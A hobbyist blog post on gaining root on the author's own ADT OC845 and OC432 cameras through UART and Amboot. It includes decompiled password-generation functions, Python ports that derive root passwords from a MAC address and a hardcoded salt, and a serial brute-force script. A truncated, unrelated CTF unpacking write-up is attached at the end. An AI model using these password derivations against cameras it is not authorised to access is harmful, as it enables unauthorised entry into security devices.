Hacking Cheap IoT Cameras for Fun and No Profit

2025-10-14T22:23:37-05:00

So as luck would have it, I came into possession of two pretty old IoT cameras. Although I had physical ownership of the devices, I was unable to actually use them and was unsure what to do with them. Probably the smartest thing to do at this point would have been to just throw them away and get new cameras that would work better anyways, but in my case, I saw this as a challenge.

Getting Started</h2>
The first step in anything like this was to identify what I actually had and then see if anyone else has already cracked open the cameras. On first inspection, I was able to identify the cameras as ADT OC845 and OC432 models. Looking online I soon stumbled upon some ancient looking blog posts</a> and GitHub repositories</a> that seemed to indicate that these were rather simple to get into.

Easy Part first</h3>

I started with the OC845 because it was a WiFi camera. Rather than go into that just yet, let me tell you what ended up happening with the OC432 camera which is a wired ethernet PoE camera. Long story short, it works exactly like those previous sources say. You put a paperclip into the reset button, hold for a bit, and then plug it into the network (while making sure to block internet access), and then you can login with the username of administrator</code> and no password.

I tell you that because I only discovered that this camera was that easy after I tackled the WiFi model. I was expecting the wired one to be just as hard but was into it in less than ten minutes. It would take me a few weeks to get into the WiFi model.

The Rest of the story</h2>

I tried to no end to get the reset button and default credentials to work on the OC845, but to no end.  I was able to hold the WPS button on the back, get it reset, and connect it to my WiFi network without a problem.  I could even probe some of the Sercomm-API URLs, but they all required HTTP basic authentcation with credentials that I did not possess. I tried various credentials I found online that should work such as in this blogpost</a> but alas, they also did not work.</p>
After trying some fairly normal things, I decided to bite the bullet and tear the camera apart to see what lie inside.  It was interesting to find just a few PCB boards sandwiched together, but on one I found what appearead to be a UART header as you can see at the top of this photo:
</p>
I also discovered this website</a> which happens to have photos of every internal board as well as what the camera looks like put together, and the manual for the camera.</p>
At this point, I was stuck.  I didn't have the connector I needed to make the UART header work, so I had to wait until I could order one.  A few days later, I was able to use my new connector socket that I purchased work with my Raspberry Pi Pico that I setup to be a USB to serial converter, and upon booting the camera I was presented with some output in minicom:</p>
NAND: Macronix MX30LF1GE8AB_128MB_PG2K</span></span>
ret_val of nand read:0</span></span>
raw magic:FFFFFFFFret_val of nand read:0</span></span>
raw magic:524F4E47CRC32 of PTB in FW:ED0A4DCA</span></span>
the correct CRC32:ED0A4DCA</span></span>
SYS_CONFIG: 0x3007001A POC: 101</span></span>
Cortex freq: 720000000</span></span>
ENET freq: 50000000</span></span>
iDSP freq: 216000000</span></span>
Dram freq: 528000000</span></span>
Core freq: 216000000</span></span>
AHB freq: 108000000</span></span>
APB freq: 54000000</span></span>
UART freq: 24000000</span></span>
SD freq: 50000000</span></span>
SDIO freq: 50000000</span></span>
SDXC freq: 60000000</span></span>
</span>
==========================================</span></span>
Neutral Bootloader  V1.15</span></span>
==========================================</span></span>
the model is OC845</span></span>
other model,do nothing</span></span>
sc_main(1236):start parse protect area information</span></span>
load_partition_table(1004):load partition table from flash</span></span>
*****************Partition table header************</span></span>
  version 4098</span></span>
  entry num 6</span></span>
*****************Partition table entry*************</span></span>
  id 1 version 4097 offset 0 length 50331648</span></span>
  id 2 version 4097 offset 50331648 length 50331648</span></span>
  id 3 version 4097 offset 100663296 length 18874368</span></span>
  id 6 version 4097 offset 119537664 length 4194304</span></span>
  id 4 version 4097 offset 123731968 length 9437184</span></span>
  id 5 version 4097 offset 133169152 length 1048576</span></span>
**************************************************</span></span></code></pre>
At this point, I was getting really excited, and then the boot process completed and I saw the Linux login prompt.  Which was a sad sight to see since it meant I needed credentials.  I then tried to type into the console, and it didn't work, go figure.</p>
Needless to say, it took a few days and a purchase of a dedicated serial to USB converter for me to realize that I had swapped the TX and VCC wires (hardware is not my strong suit if you can tell)</em>.  Once I got input working, I then rushed to try any manner of credentials I had, and they all failed.</p>
Back to the Drawing Board</h2>
Now I was kinda stuck.  I had console on the device and the device itself, but I still needed credentials.  I finally thought that maybe I could figure out if the password is being generated somehow and if I had an older dump of the firmware, maybe I could figure it out from that.</p>
I found this GitHub issue</a> where someone was looking at a function and claimed to have a password, but it didn't work.  Finally, I found this issue</a> that linked this firmware</a>.</p>
Cool, so now I had some kind of firmware.  I used binwalk</code> to extract the firmware and look inside the filesystem, and basically you end up with a few key files:</p>
/etc/rc.sethost</span></span>
/usr/lib/libcgicomm.so.0.0</span></span>
/usr/lib/libcgilib.so.0.0</span></span>
/usr/lib/libsccomm.so.0.0</span></span></code></pre>
I fired up Ghidra and started poking around, and low and behold, I found the function from the screenshot in the one GitHub issue:</p>
undefined4 </span>id2pwd</span>(</span>ushort</span> param_1</span>,undefined1 </span>*</span>param_2</span>)</span></span>
</span>
{</span></span>
  undefined4 local_74;</span></span>
  undefined1 auStack_68 [</span>16</span>];</span></span>
  undefined1 auStack_58 [</span>16</span>];</span></span>
  undefined1 auStack_48 [</span>16</span>];</span></span>
  undefined1 auStack_38 [</span>16</span>];</span></span>
  undefined1 auStack_28 [</span>20</span>];</span></span>
  </span></span>
  memcpy</span>(auStack_28,</span>"ABCDEFGHIJABCDEF[SYSTEM]"</span>,</span>0x</span>10</span>);</span></span>
  memcpy</span>(auStack_38,</span>"qrstuvwxyzqrstuvABCDEFGHIJABCDEF[SYSTEM]"</span>,</span>0x</span>10</span>);</span></span>
  memcpy</span>(auStack_48,</span>"0123456789012345qrstuvwxyzqrstuvABCDEFGHIJABCDEF[SYSTEM]"</span>,</span>0x</span>10</span>);</span></span>
  memcpy</span>(auStack_58,</span>"!@#_+!@#_+!@#_+!0123456789012345qrstuvwxyzqrstuvABCDEFGHIJABCDEF[SYSTEM]"</span>,</span>0x</span>10</span>)</span></span>
  ;</span></span>
  memcpy</span>(auStack_68,</span></span>
         "0123456789ABCDEF!@#_+!@#_+!@#_+!0123456789012345qrstuvwxyzqrstuvABCDEFGHIJABCDEF[SYSTEM]"</span>,</span></span>
         0x</span>10</span>);</span></span>
  if</span> (param_2 </span>==</span> (undefined1 </span>*</span>)</span>0x</span>0</span>) {</span></span>
    local_74 </span>= 0x</span>ffffffff</span>;</span></span>
  }</span></span>
  else</span> {</span></span>
    *</span>param_2 </span>=</span> auStack_28</span>[param_1 </span>>> 0x</span>c</span>];</span></span>
    param_2</span>[</span>1</span>]</span> =</span> auStack_38</span>[param_1 </span>>></span> 8</span> & 0x</span>f</span>];</span></span>
    param_2</span>[</span>2</span>]</span> =</span> auStack_48</span>[param_1 </span>>></span> 4</span> & 0x</span>f</span>];</span></span>
    param_2</span>[</span>3</span>]</span> =</span> auStack_58</span>[param_1 </span>& 0x</span>f</span>];</span></span>
    param_2</span>[</span>4</span>]</span> =</span> auStack_68</span>[param_1 </span>>> 0x</span>c</span>];</span></span>
    param_2</span>[</span>5</span>]</span> =</span> auStack_68</span>[param_1 </span>>></span> 8</span> & 0x</span>f</span>];</span></span>
    param_2</span>[</span>6</span>]</span> =</span> auStack_68</span>[param_1 </span>>></span> 4</span> & 0x</span>f</span>];</span></span>
    param_2</span>[</span>7</span>]</span> =</span> auStack_68</span>[param_1 </span>& 0x</span>f</span>];</span></span>
    param_2</span>[</span>8</span>]</span> =</span> 0</span>;</span></span>
    local_74 </span>=</span> 0</span>;</span></span>
  }</span></span>
  return</span> local_74;</span></span>
}</span></span></code></pre>
And then I used an LLM to re-write it in python for easy use:</p>
def</span> generate_password_from_id</span>(user_id:</span> int</span>) -></span> str</span>:</span></span>
    # Corrected character sets based on first 16 bytes</span></span>
    char_set1</span> =</span> "ABCDEFGHIJABCDEF"</span></span>
    char_set2</span> =</span> "qrstuvwxyzqrstuv"</span></span>
    char_set3</span> =</span> "0123456789012345"</span></span>
    char_set4</span> =</span> "!@#_+!@#_+!@#_+!"</span></span>
    char_set5</span> =</span> "0123456789ABCDEF"</span></span>
</span>
    # Extract 4-bit indices</span></span>
    index1</span> =</span> user_id</span> >> 0x</span>c</span></span>
    index2</span> =</span> (user_id</span> >></span> 8</span>)</span> & 0x</span>f</span></span>
    index3</span> =</span> (user_id</span> >></span> 4</span>)</span> & 0x</span>f</span></span>
    index4</span> =</span> user_id</span> & 0x</span>f</span></span>
</span>
    # Generate password</span></span>
    password</span> =</span> (</span></span>
        char_set1[index1]</span> +</span></span>
        char_set2[index2]</span> +</span></span>
        char_set3[index3]</span> +</span></span>
        char_set4[index4]</span> +</span></span>
        char_set5[index1]</span> +</span></span>
        char_set5[index2]</span> +</span></span>
        char_set5[index3]</span> +</span></span>
        char_set5[index4]</span></span>
    )</span></span>
</span>
    return</span> password</span></span>
</span>
# Test</span></span>
if</span> __name__</span> ==</span> "__main__"</span>:</span></span>
    test_ids</span> =</span> [</span>0x</span>0009</span>,</span> 0x</span>0025</span>,</span> 0x</span>018d</span>,</span> 0x</span>0057</span>,</span> 0x</span>ffff</span>]</span></span>
    for</span> user_id</span> in</span> test_ids:</span></span>
        password</span> =</span> generate_password_from_id(user_id)</span></span>
        print</span>(</span>f</span>"User ID: 0x</span>{</span>user_id</span>:04x</span>}</span>, Password: </span>{</span>password</span>}</span>"</span>)</span></span></code></pre>
And now I was just tring to figure out what the user_id</code> variable value was and then in theory, I would have the password.  After staring at the Ghidra decompile for a few minutes it struck me that I wasn't reading it right and the value being passed to the function was literally the value 0x9</code>.  Run that through the Python function and you get Aq0+0009</code> which is ironically exactly what the "leaked" root password for the device was.</p>
Well, at this point I had the realization that maybe that value was hardcoded in every firmware to a different value, and I could just brute force it, since the maximum value for user_id</code> was only 0xffff</code> and that wouldn't take too many days to run through a linux console.</p>
I was also feeling kind of burnt at this point, so the thought of letting this go for a few days while still technically making progress was very appealing to me.  So I let it start chugging on a modified LLM script that utilzied the previously shown function.</p>
import</span> machine</span></span>
import</span> time</span></span>
from</span> machine</span> import</span> Pin</span></span>
</span>
led</span> =</span> Pin(</span>"LED"</span>, Pin.</span>OUT</span>)</span></span>
</span>
# Configure UART0 (GPIO 0 = TX, GPIO 1 = RX) at 115200 baud</span></span>
uart</span> =</span> machine.UART(</span>0</span>,</span> 115200</span>,</span> tx</span>=</span>0</span>,</span> rx</span>=</span>1</span>)</span></span>
uart.init(</span>115200</span>,</span> bits</span>=</span>8</span>,</span> parity</span>=</span>None</span>,</span> stop</span>=</span>1</span>)</span></span>
</span>
# Lists to brute force</span></span>
usernames</span> =</span> [</span>'root'</span>]</span></span>
</span>
def</span> try_login</span>(username, password):</span></span>
    time.sleep(</span>0.1</span>)</span></span>
    attempts</span> =</span> 0</span></span>
    while not</span> uart.any():</span></span>
        uart.write(</span>'</span>\n</span>'</span>.encode())</span></span>
        time.sleep(</span>0.1</span>)</span></span>
    line</span> =</span> uart.read().decode(</span>'utf-8'</span>).strip()</span></span>
    print</span>(line)</span></span>
    while</span> 'oc845ffa18d login:'</span> not in</span> line.lower():</span></span>
        print</span>(line)</span></span>
        uart.write(</span>'</span>\n</span>'</span>.encode())</span></span>
        time.sleep(</span>0.1</span>)</span></span>
        while not</span> uart.any():</span></span>
            time.sleep(</span>0.1</span>)</span></span>
        line</span> =</span> uart.read().decode(</span>'utf-8'</span>).strip()</span></span>
    uart.write((username</span> +</span> '</span>\n</span>'</span>).encode())</span></span>
    time.sleep(</span>0.5</span>)</span></span>
    while not</span> uart.any():</span></span>
        time.sleep(</span>0.1</span>)</span></span>
    line</span> =</span> uart.read().decode(</span>'utf-8'</span>).strip()</span></span>
    print</span>(line)</span></span>
    while</span> 'password:'</span> not in</span> line.lower():</span></span>
        time.sleep(</span>0.1</span>)</span></span>
        while not</span> uart.any():</span></span>
            time.sleep(</span>0.1</span>)</span></span>
        line</span> =</span> uart.read().decode(</span>'utf-8'</span>).strip()</span></span>
        print</span>(line)</span></span>
    uart.write((password</span> +</span> '</span>\n</span>'</span>).encode())</span></span>
    led.off()</span></span>
    time.sleep(</span>4</span>)</span></span>
    led.on()</span></span>
    while not</span> uart.any():</span></span>
        time.sleep(</span>0.1</span>)</span></span>
    response</span> =</span> uart.read().decode(</span>'utf-8'</span>)</span></span>
    print</span>(</span>"Received response: "</span>)</span></span>
    print</span>(response)</span></span>
    print</span>(</span>"End attempt"</span>)</span></span>
    if</span> '#'</span> in</span> response</span> or</span> '$'</span> in</span> response</span> or</span> 'sh:'</span> in</span> response:</span>  # Shell prompt indicators</span></span>
        return</span> True</span>, response</span></span>
    else</span>:</span></span>
        return</span> False</span>, response</span></span>
</span>
    return</span> False</span>,</span> "No login prompt found"</span></span>
</span>
# Brute force loop</span></span>
for</span> username</span> in</span> usernames:</span></span>
    for</span> id</span> in</span> range</span>(</span>0</span>,</span>0x</span>ffff</span>):</span></span>
        tried</span> =</span> False</span></span>
        while not</span> tried:</span></span>
            try</span>:</span></span>
                password</span> =</span> generate_password_from_id(</span>id</span>)</span></span>
                success, response</span> =</span> try_login(username, password)</span></span>
                tried</span> =</span> True</span></span>
            except</span> Exception</span> as</span> e:</span></span>
                pass</span></span>
        print</span>(</span>f</span>"Tried </span>{</span>username</span>}</span>/</span>{</span>password</span>}</span>: </span>{</span>'Success'</span> if</span> success</span> else</span> 'Fail'</span>}</span>"</span>)</span></span>
        if</span> success:</span></span>
            print</span>(</span>f</span>"Successful login! Response: </span>{</span>response</span>}</span>"</span>)</span></span>
            while</span> True</span>:</span></span>
                for</span> x</span> in</span> range</span>(</span>0</span>,</span>30</span>):</span></span>
                    led.on()</span></span>
                    sleep(</span>.1</span>)</span></span>
                    led.off()</span></span>
                print</span>(</span>f</span>"Used </span>{</span>username</span>}</span>/</span>{</span>password</span>}</span>"</span>)</span></span></code></pre>
I ran it on a Raspberry Pi Pico, and even added the feature to flash the LED on the Pico in a specific way so I could unplug from it and check it later and see whether it found a match.  After about three days, it reached the end without finding the password.</p>
Dead End</h2>
By now I was feeling desparate.  I started researching anything and everything IoT hacking related to see what I could do short of taking the flash off the chip and reading it (which was a viable, if not difficult option).  I started reading about glitch hacking and tried my hand at that, essentially inserting a wire into the NAND flash chip during bootup to cause a short circuit and hopefully corrupt some data being read with the hope that it would drop me at the bootloader or Linux shell.</p>
I was able to successfully glitch and cause data read errors, but unfortunately the developers had done their job and the device just halted after two attempts and didn't provide me with any access.</p>
Around this time, I also experimented with a Micro USB OTG cable and a USB ethernet adapter to see if that would work and allow me to use the normal reset functionality.  I also tried to see if I could get the device itself to become a USB ethernet adapter since it printed some ether gadget things that made it seem possible. None of these things worked and I was left without any options.</p>
A Beacon of Light</h2>
Then I happened to stumble upon this forum post</a> while searching different strings about the processor SOC.  And in it, the author describes that to interrupt the Amboot bootloader you just have to hold enter on bootup.  I was sitting their thinking its worth a shot at this point.  So I booted it up, expecting nothing, but lo and behold it dropped me at the Amboot shell.</p>
I had no clue what Amboot was (and still don't really), but I was able to figure out a few commands.  I could've simply used tftp and tried to boot that way, the only issue was that I would've needed to figure out how to connect via WiFi from the bootloader menu, which seemed to me like it would be difficult.  Luckily, Amboot has a nand</code> command where you can actually dump individual pages of the NAND flash as a hex dump.</p>
So, using my serial to USB and adapting my previous scripts, I wrote a little bit more Python to get me a firmware dump:</p>
import</span> serial</span></span>
import</span> time</span></span>
</span>
# Serial port configuration</span></span>
serial_port</span> =</span> '/dev/tty.usbserial-0001'</span></span>
baud_rate</span> =</span> 115200</span></span>
</span>
ser</span> =</span> serial.Serial(serial_port, baud_rate,</span> timeout</span>=</span>1</span>)</span></span>
</span>
num_of_pages</span> =</span> 65535</span></span>
</span>
def</span> get_shell</span>():</span></span>
    ser.flush()</span></span>
    time.sleep(</span>0.1</span>)</span></span>
    line</span> =</span> ser.readline().decode(</span>'utf-8'</span>,</span> errors</span>=</span>'ignore'</span>).strip()</span></span>
    while</span> 'amboot>'</span> not in</span> line.lower():</span></span>
        print</span>(line)</span></span>
        ser.write(</span>'</span>\n</span>'</span>.encode())</span></span>
        time.sleep(</span>0.1</span>)</span></span>
        line</span> =</span> ser.readline().decode(</span>'utf-8'</span>,</span> errors</span>=</span>'ignore'</span>).strip()</span></span>
</span>
def</span> dump_nand_page</span>(id):</span></span>
</span>
    data</span> =</span> bytearray</span>()</span></span>
</span>
    payload</span> =</span> 'nand dump '</span> +</span> str</span>(</span>id</span>)</span> +</span> '</span>\n</span>'</span></span>
    ser.write(payload.encode())</span></span>
    time.sleep(</span>0.01</span>)</span></span>
    line</span> =</span> ser.readline().decode(</span>'utf-8'</span>,</span> errors</span>=</span>'ignore'</span>).strip()</span></span>
    while</span> 'main data:'</span> not in</span> line.lower():</span></span>
        time.sleep(</span>0.01</span>)</span></span>
        line</span> =</span> ser.readline().decode(</span>'utf-8'</span>,</span> errors</span>=</span>'ignore'</span>).strip()</span></span>
</span>
    line</span> =</span> ser.readline().decode(</span>'utf-8'</span>,</span> errors</span>=</span>'ignore'</span>).strip()</span></span>
    while</span> 'spare data:'</span> not in</span> line.lower():</span></span>
        array</span> =</span> line.split(</span>' '</span>)</span></span>
        for</span> byte</span> in</span> array:</span></span>
            data</span> +=</span> bytearray</span>.fromhex(byte)</span></span>
        time.sleep(</span>0.01</span>)</span></span>
        line</span> =</span> ser.readline().decode(</span>'utf-8'</span>,</span> errors</span>=</span>'ignore'</span>).strip()</span></span>
</span>
    ser.flush()</span></span>
    return</span> data</span></span>
</span>
</span>
with</span> open</span>(</span>'firmware.bin'</span>,</span> 'ab'</span>)</span> as</span> file</span>:</span></span>
    get_shell()</span></span>
    for</span> i</span> in</span> range</span>(</span>0</span>,num_of_pages</span>+</span>1</span>):</span></span>
        data</span> =</span> dump_nand_page(i)</span></span>
        file</span>.write(data)</span></span>
</span>
ser.close()</span></span></code></pre>
I let that run for a few days, and then I had the firmware, finally!</p>
Home Stretch</h2>
At this point, I thought I knew what to do.  I fired up Ghidra, took a look at the same places I had before, and found the same id2pwd</code> function, threw an LLM at it, took the static value of 0x57</code> and got a password, and tried it, and it didn't work.</p>
Here is the function in case you happen to need it for some reason (I feel compassionate towards those on random internet blogs reading about obscure IoT cameras now):</p>
def</span> id2pwd</span>(param_1):</span></span>
    # Initialize the character array (string in Python)</span></span>
    dictionary</span> =</span> "ABCDEFGHIJABCDEFqrstuvwxyzqrstuv0123456789012345!@#_+!@#_+!@#_+!0123456789ABCDEF"</span></span>
</span>
    passwd</span> =</span> [</span></span>
        '0'</span>,</span></span>
        '0'</span>,</span></span>
        '0'</span>,</span></span>
        '0'</span>,</span></span>
        '0'</span>,</span></span>
        '0'</span>,</span></span>
        '0'</span>,</span></span>
        '0'</span>,</span></span>
        '0'</span>,</span></span>
    ]</span></span>
</span>
    # Bit manipulations to extract indices</span></span>
    uVar9</span> =</span> (param_1</span> << 0x</span>14</span>)</span> >> 0x</span>1c</span>  # Equivalent to (param_1 << 20) >> 28</span></span>
    uVar10</span> =</span> (param_1</span> << 0x</span>18</span>)</span> >> 0x</span>1c</span>  # Equivalent to (param_1 << 24) >> 28</span></span>
</span>
    # Extract characters from dictionary based on calculated indices</span></span>
    cVar1</span> =</span> dictionary[uVar9</span> + 0x</span>40</span>]</span></span>
    cVar2</span> =</span> dictionary[uVar10</span> + 0x</span>20</span>]</span></span>
    cVar3</span> =</span> dictionary[uVar10</span> + 0x</span>40</span>]</span></span>
    cVar4</span> =</span> dictionary[(param_1</span> & 0x</span>f</span>)</span> + 0x</span>30</span>]</span></span>
    cVar5</span> =</span> dictionary[(param_1</span> & 0x</span>f</span>)</span> + 0x</span>40</span>]</span></span>
    cVar6</span> =</span> dictionary[param_1</span> >> 0x</span>c</span>]</span></span>
    cVar7</span> =</span> dictionary[(param_1</span> >> 0x</span>c</span>)</span> + 0x</span>40</span>]</span></span>
</span>
    # Build the output string in passwd (assumed to be a list or bytearray for mutability)</span></span>
    passwd[</span>1</span>]</span> =</span> dictionary[uVar9</span> + 0x</span>10</span>]</span></span>
    passwd[</span>5</span>]</span> =</span> cVar1</span></span>
    passwd[</span>2</span>]</span> =</span> cVar2</span></span>
    passwd[</span>6</span>]</span> =</span> cVar3</span></span>
    passwd[</span>3</span>]</span> =</span> cVar4</span></span>
    passwd[</span>7</span>]</span> =</span> cVar5</span></span>
    passwd[</span>0</span>]</span> =</span> cVar6</span></span>
    passwd[</span>4</span>]</span> =</span> cVar7</span></span>
    passwd[</span>8</span>]</span> =</span> '</span>\0</span>'</span>  # Null-terminate the string</span></span>
</span>
    passwd_str</span> =</span> ""</span></span>
    for</span> char</span> in</span> passwd:</span></span>
        passwd_str</span> +=</span> char</span></span>
</span>
    return</span> passwd_str</span></span>
</span>
print</span>(id2pwd(</span>0x</span>57</span>))</span></span></code></pre>
The key difference with the firmware of this camera is that ADT added their own stuff on top of the original Sercomm firmware.  So going through Ghidra I was able to eventually find the specific binary being called and start to work through that, eventually finding the following function:</p>
generatePasswordFromMAC</span>(</span>char *</span>mac</span>,</span>size_t</span> maclen</span>)</span></span>
{</span></span>
  int</span> iVar1;</span></span>
  size_t</span> sVar2;</span></span>
  size_t</span> __n;</span></span>
  size_t</span> maclen_local;</span></span>
  char *</span>mac_local;</span></span>
  uchar obuf [</span>20</span>];</span></span>
  uchar</span>[</span>0</span>]</span> *</span>ibuf;</span></span>
  int</span> i;</span></span>
  </span></span>
  maclen_local </span>=</span> maclen;</span></span>
  mac_local </span>=</span> mac;</span></span>
  adcStrupper</span>(mac);</span></span>
  __n </span>=</span> maclen_local </span>+ 0x</span>21</span>;</span></span>
  iVar1 </span>= -</span>(maclen_local </span>+ 0x</span>28</span> & 0x</span>fffffff8</span>);</span></span>
  memset</span>((</span>void *</span>)((</span>int</span>)</span>&</span>maclen_local </span>+</span> iVar1),</span>0</span>,__n);</span></span>
  strncpy</span>((</span>char *</span>)((</span>int</span>)</span>&</span>maclen_local </span>+</span> iVar1),mac_local,__n);</span></span>
  sVar2</span> =</span> strlen</span>((</span>char *</span>)((</span>int</span>)</span>&</span>maclen_local </span>+</span> iVar1));</span></span>
  strncat</span>((</span>char *</span>)((</span>int</span>)</span>&</span>maclen_local </span>+</span> iVar1),</span>"06D58FFA826502BA52D3317A95169346"</span>,(__n </span>-</span> sVar2)</span> -</span> 1</span>)</span></span>
  ;</span></span>
  obuf</span>[</span>0</span>]</span> =</span> '</span>\0</span>'</span>;</span></span>
  obuf</span>[</span>1</span>]</span> =</span> '</span>\0</span>'</span>;</span></span>
  obuf</span>[</span>2</span>]</span> =</span> '</span>\0</span>'</span>;</span></span>
  obuf</span>[</span>3</span>]</span> =</span> '</span>\0</span>'</span>;</span></span>
  obuf</span>[</span>4</span>]</span> =</span> '</span>\0</span>'</span>;</span></span>
  obuf</span>[</span>5</span>]</span> =</span> '</span>\0</span>'</span>;</span></span>
  obuf</span>[</span>6</span>]</span> =</span> '</span>\0</span>'</span>;</span></span>
  obuf</span>[</span>7</span>]</span> =</span> '</span>\0</span>'</span>;</span></span>
  obuf</span>[</span>8</span>]</span> =</span> '</span>\0</span>'</span>;</span></span>
  obuf</span>[</span>9</span>]</span> =</span> '</span>\0</span>'</span>;</span></span>
  obuf</span>[</span>10</span>]</span> =</span> '</span>\0</span>'</span>;</span></span>
  obuf</span>[</span>0x</span>b</span>]</span> =</span> '</span>\0</span>'</span>;</span></span>
  obuf</span>[</span>0x</span>c</span>]</span> =</span> '</span>\0</span>'</span>;</span></span>
  obuf</span>[</span>0x</span>d</span>]</span> =</span> '</span>\0</span>'</span>;</span></span>
  obuf</span>[</span>0x</span>e</span>]</span> =</span> '</span>\0</span>'</span>;</span></span>
  obuf</span>[</span>0x</span>f</span>]</span> =</span> '</span>\0</span>'</span>;</span></span>
  obuf</span>[</span>0x</span>10</span>]</span> =</span> '</span>\0</span>'</span>;</span></span>
  obuf</span>[</span>0x</span>11</span>]</span> =</span> '</span>\0</span>'</span>;</span></span>
  obuf</span>[</span>0x</span>12</span>]</span> =</span> '</span>\0</span>'</span>;</span></span>
  obuf</span>[</span>0x</span>13</span>]</span> =</span> '</span>\0</span>'</span>;</span></span>
  sVar2</span> =</span> strlen</span>((</span>char *</span>)((</span>int</span>)</span>&</span>maclen_local </span>+</span> iVar1));</span></span>
  SHA1</span>((uchar </span>*</span>)((</span>int</span>)</span>&</span>maclen_local </span>+</span> iVar1),sVar2,obuf);</span></span>
  for</span> (i </span>=</span> 0</span>; i </span><</span> 6</span>; i </span>=</span> i </span>+</span> 1</span>) {</span></span>
    printf</span>(</span>"</span>%02x</span>"</span>,(</span>uint</span>)</span>obuf</span>[i]);</span></span>
  }</span></span>
  return</span>;</span></span>
}</span></span></code></pre>
Using the power of LLMs, I was able to convert to Python and get:</p>
import</span> hashlib</span></span>
</span>
def</span> generatePasswordFromMAC</span>(mac, maclen):</span></span>
    # Convert mac string to uppercase (equivalent to adcStrupper)</span></span>
    mac</span> =</span> mac.upper()</span></span>
</span>
    # Calculate buffer size and alignment</span></span>
    __n</span> =</span> maclen</span> + 0x</span>21</span></span>
    iVar1</span> = -</span>(maclen</span> + 0x</span>28</span> & 0x</span>fffffff8</span>)</span>  # Align to 8-byte boundary</span></span>
</span>
    # Create a bytearray for string operations (simulating C's memory buffer)</span></span>
    buffer</span> =</span> bytearray</span>(__n)</span></span>
    buffer[:maclen]</span> =</span> mac.encode()</span>  # Copy mac into buffer</span></span>
</span>
    # Append the constant string</span></span>
    constant</span> =</span> "06D58FFA826502BA52D3317A95169346"</span></span>
    buffer[maclen:maclen</span> +</span> len</span>(constant)]</span> =</span> constant.encode()</span></span>
</span>
    # Compute SHA-1 hash of the buffer</span></span>
    obuf</span> =</span> hashlib.sha1(buffer[:maclen</span> +</span> len</span>(constant)]).digest()</span></span>
</span>
    # Print first 6 bytes of the hash in hexadecimal</span></span>
    for</span> i</span> in</span> range</span>(</span>6</span>):</span></span>
        print</span>(</span>f</span>"</span>{</span>obuf[i]</span>:02x</span>}</span>"</span>,</span> end</span>=</span>""</span>)</span></span>
</span>
    return</span></span>
</span>
mac</span> =</span> "0a0a0a0a0a0a"</span></span>
generatePasswordFromMAC(mac,</span> len</span>(mac))</span></span></code></pre>
And then I tried the password, and it worked!  I had root on the device and was able to do as I pleased with it.</p>
Fortunately, the root password also worked to get into the web interface of the device with the username administrator</code> and I was able to change the password, disable the VPN that was attempting to call back to ADT, and setup RTSP video feeds.</p>
Conclusion</h2>
So all in, I probably spent a month on and off working on this, but I was happy to have access to both cameras.  I learned a lot from the experience, and it was fun to muck around in weird Linux setups and see the weirdness that is older IoT code.  Feel free to leave a comment if you had any questions or if you want a copy of the firmware for further research.</p>
References</h2>

https://shkspr.mobi/blog/2013/11/hacking-around-with-network-cameras/</li>
https://shkspr.mobi/blog/2017/11/telnet-and-root-on-the-sercomm-icamera2/</li>
https://github.com/edent/Sercomm-API</li>
https://web.archive.org/web/20230123041046/https://dl.packetstormsecurity.net/papers/general/reverse_engineering_ip_camera_firmware.pdf</li>
https://itbyfire.blogspot.com/search/label/xfinity%20camera%20hack%20icamera2%20hacking%20home%20security</li>
https://fccid.io/P27OC845/User-Manual/Users-Manual-4489631</li>
https://www.ispyconnect.com/camera/adt</li>
https://www.manualslib.com/manual/1885455/Adt-Oc845.html?page=6#manual</li>
https://www.reddit.com/r/homesecurity/comments/14qv04q/oc845_adt_default_userpass/</li>
https://www.reddit.com/r/videosurveillance/comments/ca6u1w/working_with_proprietary_cameras_ie_comcast_and/</li>
https://community.home-assistant.io/t/use-for-that-old-adt-camera/390634</li>
https://riverloopsecurity.com/blog/2020/01/hw-101-uart/</li>
https://iridiumxor.wordpress.com/2019/04/09/trouble-for-nothing/</li>
https://gist.github.com/ThomasKaiser/d99228ac986378c41f4f8e6bc3f5cb70</li>
https://en.wikipedia.org/wiki/ARM_Cortex-A9</li>
https://dashcamtalk.com/forum/threads/mini0801-hacking-hardware-and-software.3157/</li>
https://github.com/santeri3700/opticam_o8_hacking</li>
https://github.com/hello/kasa/blob/master/ambarella/amboot/include/amboot.h</li>
https://github.com/hello/kasa/tree/master</li>
https://ipcamtalk.com/threads/unbricking-another-mini-ptz-v2-skipping-much-of-the-tech-stuff.12929/</li>
https://dc.str2b.dev/ambarella/firmware</li>
https://www.infosecinstitute.com/resources/penetration-testing/gaining-shell-access-via-uart-interface-part-3/</li>
https://gist.github.com/pepe2k/d1467195abdffbcf2615e066fd9d42b7</li>
https://github.com/digiampietro/hacking-gemtek?tab=readme-ov-file#splitting-the-eeprom-image-partitions</li>
</ul>

Flag 2024-10-28T16:37:09-05:00 This time we just get a single binary. Running the binary says this: $ ./flag I will malloc() and strcpy the flag there. take it.</code></pre> So let's open the program in pwndbg and walk through it. Well it seems that there are no symbols defined... Weird. pwndbg> info func All defined functions:</code></pre> Running checksec on the binary shows that there is no PIE, so addresses will be static, but it does appear to be packed so let's try unpacking it: $ checksec flag Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX unknown - GNU_STACK missing PIE: No PIE (0x400000) Stack: Executable RWX: Has RWX segments Packer: Packed with UPX</code></pre> That worked: $ upx -d flag Ultimate Packer for eXecutables Copyright (C) 1996 - 2024 UPX 4.2.3 Markus Oberhumer, Laszlo Molnar & John Reiser Mar 27th 2024 File size Ratio Format Name -------------------- ------ ----------- ----------- 887219 <- 335288 37.79% linux/amd64 flag Unpacked 1 file. </code></pre> Now running info func</code> gives a lot more functions: pwndbg> info func All defined functions: Non-debugging symbols: 0x00000000004002f8 _init 0x00000000004003d0 check_one_fd.part 0x0000000000400441 munmap_chunk.part 0x0000000000400455 group_number 0x0000000000400557 _i18n_number_rewrite 0x000000000040073c _i18n_number_rewrite 0x0000000000400921 is_trusted_path_normalize 0x0000000000400a1a print_search_path 0x0000000000400b69 strip 0x0000000000400bd9 group_number 0x0000000000400ca3 _i18n_number_rewrite 0x0000000000400dd0 fini 0x0000000000400de0 init_cacheinfo 0x0000000000401058 _start 0x0000000000401084 call_gmon_start 0x00000000004010a0 __do_global_dtors_aux 0x0000000000401120 frame_dummy 0x0000000000401164 main ...</code></pre> Okay so let's set a breakpoint at main and see if we catch the strcpy call. It looks like when we get to address 0x401195</code> that this is the call to strcpy and the string is there in memory which pwndbg</code> helpfully shows for us so that is probably the flag: RAX 0x6c96b0 ◂— 0x0 RBX 0x401ae0 